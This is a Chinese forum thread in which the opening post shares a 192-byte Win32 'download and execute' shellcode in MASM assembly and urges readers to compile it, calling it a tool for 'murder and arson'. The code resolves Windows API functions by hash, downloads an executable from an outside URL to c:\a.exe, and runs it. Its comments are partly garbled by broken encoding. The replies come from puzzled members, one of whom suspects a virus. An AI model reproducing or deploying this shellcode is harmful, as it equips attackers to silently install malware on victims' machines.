在线情况
楼主
  • 头像
  • 级别
    • 积分47
    • 经验157
    • 文章36
    • 注册2008-05-17
    win32 Tiny Download and Exec Shellcode 192 bytes
    不是老有人卖下载者的吗?其实他们卖的东西未必是自己写的。只不过是大家自己没有仔细研究而已。发一个巨小的好东西,至少我现在还没有发现国内哪里有的。07年6月份就出来了。我之所以发出来是因为它杀伤力大,很经典很有用,居家旅行杀人放火的好工具啊。不说了,看代码。有兴趣的自己编译一下。
    ;Tiny Download&&Exec ShellCode codz czy
    ;header 163=61(16+8+9+(28))+95(68+27)+17
    ;163+19=192
    comment %
    system :test on ie6+XPSP2/2003SP2/2kSP4
    %
    .586
    .model flat,stdcall
    option casemap:none

    include     c:\masm32\include\windows.inc
    include     c:\masm32\include\kernel32.inc
    includelib  c:\masm32\lib\kernel32.lib
    include     c:\masm32\include\user32.inc
    includelib  c:\masm32\lib\user32.lib


    .data
    shelldatabuffer db 1024 dup(0)
    shellcodebuffer    db 2046 dup(0)
    downshell    db 'down exploit',0
    .code
    start:
        invoke    MessageBoxA,0,offset downshell,offset downshell,1
        invoke    RtlMoveMemory,offset shellcodebuffer,00401040H,256
        mov    eax,offset shellcodebuffer
        jmp    eax
        somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
    ;Éà ÃæµÄ´úÂëÊǰÑÔÚ´úÂë¶ÎÖà µÄshellcodeÒÆ¶¯Êý¾à ¶ÎÖà Ö´à à £¬Ä£ÄâÕæÊµµÄshellcodeÖ´à à »·¾³    
    @@shellcodebegin:       
        call    @@beginaddr
    @@beginaddr:
        PUSH 03H      ;Òªµ÷ÓõÄAPIº¯Êý¸öÊý
        jmp    @@realshellcode          
    myExitProcess     dd 073e2d87eh  
    myWinExec         dd 00e8afe98h    
    myLoadLibraryA    dd 0ec0e4e8eh
    dll               db 'URLMON',0,0
    myUrlDownFile     dd 0702f1a36h
    path              db 'c:\a.exe',0
    url               db '[URL=http://www.ph4nt0m.org/a.exe][U][COLOR=#0000ff]http://www.ph4nt0m.org/a.exe[/COLOR][/U][/URL]',0



    @@realshellcode:
        POP ECX
        POP EDI
        SCASD ;edi+4
    ;µÃµ½kernel32.dll»ùµØÖ·
    db  67h,64h,0A1h,30h,00h
        mov eax, [eax+0cH]
        mov esi, [eax+1cH]
        lodsd
        mov ebp, [eax+08H]          ;EBPÖà ´æ·Åkernel32.dllµÄ»ùµØÖ·
    ;´¦�íµ¼³ö±í
    @@next2:
    PUSH      ECX
    @@next3:
    MOV       ESI,[EBP+3Ch]
    MOV       ESI,[EBP+ESI+78h]
    ADD       ESI,EBP
    PUSH      ESI
    MOV       ESI,[ESI+20h]
    ADD       ESI,EBP
    XOR       ECX,ECX
    DEC       ECX
    @@next:
    INC       ECX
    LODSD
    ADD       EAX,EBP
    XOR       EBX,EBX
    @@again:
        MOVSX     EDX,BYTE PTR [EAX]
        CMP       DL,DH
        JZ        @@end
        ROR       EBX,0Dh
        ADD       EBX,EDX
        INC       EAX
        JMP       @@again
    @@end:
    CMP       EBX,[EDI]
    JNZ       @@next

    POP       ESI
    MOV       EBX,[ESI+24h]
    ADD       EBX,EBP
    MOV       CX,WORD PTR [ECX*2+EBX]
    MOV       EBX,[ESI+1Ch]
    ADD       EBX,EBP
    MOV       EAX,[ECX*4+EBX]
    ADD       EAX,EBP
    STOSD
    POP       ECX
    loop @@next2

    mov ecx,[edi]   ;2
    cmp cl,'c'      ;3
    jz @@downfile   ;2
    PUSH EDI
    CALL EAX        ;2
    xchg eax,ebp
    scasd
    scasd
    push 01         ;2µÚ¶þ¸öDLLµÄº¯Êý¸öÊý
    jmp @@next3     ;2
                    ;×ܼÆ17

            
    @@downfile:

        push    edx  ;0
        push    edx  ;0
        push    edi  ;file=c:\a.exe
        lea     ecx, dword ptr [edi+9h]
        push    ecx  ;url
        push    edx  ;0
        call    eax  ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0
       
       
        push 1 ;FOR TEST
        push edi
        call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1
       
        call dword ptr [edi-18H] ;Exitprocess

        somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
        invoke ExitProcess,0
    end start
    偶的blog:www.dasek.cn亲们有时间的话去踩踩,一起交流:)
    在线情况
    2楼
    • 头像
    • 级别
      • 会员认证会员
      • 声望+6
      • 财富1
      • 积分3225
      • 经验140062
      • 文章3690
      • 注册2007-10-26
      你是字母专家吗?
      诚信做人   踏实做事
      在线情况
      3楼
      • 头像
      • 级别
      • 徽章
      • 会员认证会员
      • 声望+3
      • 积分886
      • 经验59896
      • 文章1141
      • 注册2008-02-15
      [FACE=楷体_GB2312 ][COLOR=#dddd22][SIZE=5]看来咱们宪德宗亲跟“基地组织本拉丁”接上头了有什么货?展示下让宗亲们都见识一下,开开眼界.[/SIZE][/COLOR][/FACE]
      龙山派二二世豫公戍镇龙岩所内坊三传龙岩西陂排头泉棠公(讳德存)十五代裔孙.武城派七十五派、龙山派四十代、[GLOW=255,RED,2]点击进入:[URL=http://blog.sina.com.cn/u/1898710184]老羊的博客[/URL][/GLOW]
      在线情况
      4楼
      • 头像
      • 逍遥自在
      • 级别
        • 会员认证会员
        • 财富1
        • 积分1311
        • 经验134885
        • 文章1842
        • 注册2007-04-21
        看不明。

        有待解码
        曾氏宗亲网感谢您的参与
        在线情况
        5楼
        • 头像
        • 级别
          • 积分3
          • 经验151
          • 文章4
          • 注册2008-05-20
          我越看越傻了,该不会是病毒程序吧,这个编程者也太会多国语言了
          曾氏宗亲网感谢您的参与
          在线情况
          6楼
          • 头像
          • 级别
            • 职务论坛版主
            • 声望+9
            • 财富1
            • 积分2216
            • 经验89803
            • 文章2411
            • 注册2006-09-30
            什么东东,不懂[EM21][EM21][EM10][EM10]
            天下曾氏是一家  我爱我家       曾氏第二发祥地江西省乐安县望仙里  七十四派 宪字辈  QQ:499818403
            Powered by LeadBBS 9.2 licence.
            Page created in 0.0156 seconds with 5 queries.